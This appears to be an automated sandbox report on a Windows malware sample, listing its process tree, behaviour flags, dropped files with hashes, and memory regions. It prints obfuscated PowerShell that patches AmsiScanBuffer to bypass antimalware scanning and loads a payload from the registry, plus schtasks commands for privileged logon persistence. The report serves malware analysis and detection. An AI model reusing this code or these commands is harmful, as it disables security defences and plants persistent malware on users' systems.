bzzCbmsPiTplw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hOBMPBAqVwRvEXDfA,$eFRSRwBcGZUreYFZgXlSjS).Invoke($rZFCbzzCbmsPiTplw,[uint32]8,0x20,[ref]$cOnJjPDveQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iClnMRoghVGC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aAglCGrraFiCPu,[Parameter(Position=1)][Type]$BahUwIjOZa)$zXgXzHzdDcg=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+'m'+[Char](111)+''+'r'+'y'+[Char](77)+'od'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+'n'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'toC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$zXgXzHzdDcg.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aAglCGrraFiCPu).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e,Man'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$zXgXzHzdDcg.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+'e',''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$BahUwIjOZa,$aAglCGrraFiCPu).SetImplementationFlags(''+'R'+'unti'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $zXgXzHzdDcg.CreateType();}$bTLRhLRuWnVzI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+'ve'+[Char](77)+'eth'+[Char](111)+'ds');$oLpQJqSqaKhDLU=$bTLRhLRuWnVzI.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'dre'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CnqKHkKaEjPBDnboxfJ=iClnMRoghVGC @([String])([IntPtr]);$EubakbJwECtEDjVOwjkAAS=iClnMRoghVGC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZCkhRAIxogQ=$bTLRhLRuWnVzI.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$kJrJQVJhOOwBrD=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+'a'+''+[Char](114)+'y'+'A'+'')));$DXJHMbtgJopyetHDG=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$ZCkhRAIxogQ,[Object]('V'+'i'+''+[Char](114)+'tu'+[Char](97)+''+'l'+'P'+[Char](114)+'o'+'t'+'e'+[Char](99)+''+[Char](116)+'')));$HhpodMZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kJrJQVJhOOwBrD,$CnqKHkKaEjPBDnboxfJ).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'');$mIOiWjGzSxsHIFBCe=$oLpQJqSqaKhDLU.Invoke($Null,@([Object]$HhpodMZ,[Object]('Ams'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$jpuIdvQmWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,4,[ref]$jpuIdvQmWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mIOiWjGzSxsHIFBCe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DXJHMbtgJopyetHDG,$EubakbJwECtEDjVOwjkAAS).Invoke($mIOiWjGzSxsHIFBCe,[uint32]8,0x20,[ref]$jpuIdvQmWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Windows\Temp\__PSScriptPolicyTest_n4kmdbep.zsw.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
338B
MD516581547ab79fb83a82d9b1fd6ebbe25
SHA160b3147772e256876a3ed75cef21b5a8cf85a438
SHA256cc5a3f5146f9d7a9502df4758b459c5de81a0d158b44c33cd64a4305a13fbaf9
SHA5126f0d0fb77591df3d2a7c1749d9630e885b23a34b1a367952262d254d3ea4c749814a5e0058c45185829ba7e58356b5cb21a03ead7cce9f1f3121c266071f391e
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD552ba05284c509a6d3ffbaad68e7ab70c
SHA1ad48e87b91a9d2b45388bf120d62c13a9198e9e8
SHA256bfa99f27c7a189bfe553664384a5cc2d8e162e2ebfd569c4f61419addd5bcc14
SHA512d9db208deb3d4c3aebf0c087249f1398800fbb1324f05742505d5f7e091696862065fa58d540cd1e69d9a2e9f6f6acc4612a0112bd6a2944badcd37f2a4941fc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5efe0903424c927d3611f8d8acd078b79
SHA122fda4e644f8fa0908493f40b930b1dff1755356
SHA25679fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6
SHA5128de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9
-
memory/588-84-0x000001BBCD240000-0x000001BBCD265000-memory.dmpFilesize
148KB
-
memory/588-93-0x00007FFA17970000-0x00007FFA17980000-memory.dmpFilesize
64KB
-
memory/588-85-0x000001BBCD270000-0x000001BBCD29B000-memory.dmpFilesize
172KB
-
memory/588-86-0x000001BBCD270000-0x000001BBCD29B000-memory.dmpFilesize
172KB
-
memory/588-92-0x000001BBCD270000-0x000001BBCD29B000-memory.dmpFilesize
172KB
-
memory/644-104-0x00007FFA17970000-0x00007FFA17980000-memory.dmpFilesize
64KB
-
memory/644-103-0x0000024DACC70000-0x0000024DACC9B000-memory.dmpFilesize
172KB
-
memory/644-97-0x0000024DACC70000-0x0000024DACC9B000-memory.dmpFilesize
172KB
-
memory/748-115-0x00000256CA910000-0x00000256CA93B000-memory.dmpFilesize
172KB
-
memory/748-116-0x00007FFA17970000-0x00007FFA17980000-memory.dmpFilesize
64KB
-
memory/748-109-0x00000256CA910000-0x00000256CA93B000-memory.dmpFilesize
172KB
-
memory/920-126-0x0000016BA17C0000-0x0000016BA17EB000-memory.dmpFilesize
172KB
-
memory/920-127-0x00007FFA17970000-0x00007FFA17980000-memory.dmpFilesize
64KB
-
memory/920-120-0x0000016BA17C0000-0x0000016BA17EB000-memory.dmpFilesize
172KB
-
memory/1004-131-0x000001F714E80000-0x000001F714EAB000-memory.dmpFilesize
172KB
-
memory/2164-72-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2164-77-0x00007FFA54E40000-0x00007FFA54EEE000-memory.dmpFilesize
696KB
-
memory/2164-71-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2164-70-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2164-76-0x00007FFA578E0000-0x00007FFA57ABB000-memory.dmpFilesize
1.9MB
-
memory/2164-75-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2164-73-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2164-78-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2524-1282-0x00000000740D0000-0x00000000747BE000-memory.dmpFilesize
6.9MB
-
memory/2524-13-0x00000000740D0000-0x00000000747BE000-memory.dmpFilesize
6.9MB
-
memory/2524-14-0x00000000740D0000-0x00000000747BE000-memory.dmpFilesize
6.9MB
-
memory/2524-48-0x00000000067D0000-0x00000000067DA000-memory.dmpFilesize
40KB
-
memory/4392-25-0x000001363EF40000-0x000001363EF62000-memory.dmpFilesize
136KB
-
memory/4392-28-0x000001363F300000-0x000001363F376000-memory.dmpFilesize
472KB
-
memory/4392-68-0x00007FFA578E0000-0x00007FFA57ABB000-memory.dmpFilesize
1.9MB
-
memory/4392-65-0x000001363F480000-0x000001363F4AA000-memory.dmpFilesize
168KB
-
memory/4392-69-0x00007FFA54E40000-0x00007FFA54EEE000-memory.dmpFilesize
696KB
-
memory/4920-5-0x0000000005640000-0x00000000056A6000-memory.dmpFilesize
408KB
-
memory/4920-6-0x0000000005AB0000-0x0000000005AC2000-memory.dmpFilesize
72KB
-
memory/4920-7-0x00000000065B0000-0x00000000065EE000-memory.dmpFilesize
248KB
-
memory/4920-20-0x00000000740D0000-0x00000000747BE000-memory.dmpFilesize
6.9MB
-
memory/4920-4-0x00000000740D0000-0x00000000747BE000-memory.dmpFilesize
6.9MB
-
memory/4920-3-0x0000000005540000-0x00000000055D2000-memory.dmpFilesize
584KB
-
memory/4920-0-0x00000000740DE000-0x00000000740DF000-memory.dmpFilesize
4KB
-
memory/4920-2-0x0000000005B40000-0x000000000603E000-memory.dmpFilesize
5.0MB
-
memory/4920-1-0x0000000000B30000-0x0000000000B9C000-memory.dmpFilesize
432KB